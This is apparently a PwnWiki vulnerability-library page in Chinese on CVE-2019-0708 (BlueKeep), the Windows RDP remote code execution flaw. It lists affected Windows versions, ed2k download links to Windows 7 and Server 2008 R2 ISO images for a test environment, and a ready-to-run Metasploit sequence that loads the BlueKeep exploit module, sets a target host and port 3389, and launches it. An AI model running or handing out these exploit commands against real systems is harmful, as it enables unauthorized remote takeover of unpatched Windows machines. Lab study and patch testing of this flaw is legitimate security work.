Loading
0

CVE-2019-0708 Windows RCE远程控制漏洞

免费、自由、人人(PwnWiki.Com)可编辑的漏洞库

,

影响版本:

Windows 7

Windows Server 2008 R2

Windows Server 2008

Windows 2003

Windows XP

环境:

Windows7:
ed2k://|file|cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso|3420557312|B58548681854236C7939003B583A8078|/

windows 2008 R2:
ed2k://|file|cn_windows_server_2008_r2_hpc_x64_dvd_552764.iso|2959194112|1941C1937261AB4F6F9A28F86FE3DAC0|/

MSF利用:


use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

set rhosts 192.168.9.132

set rport 3389

set target 3

exploit

免费、自由、人人(PwnWiki.Com)可编辑的漏洞库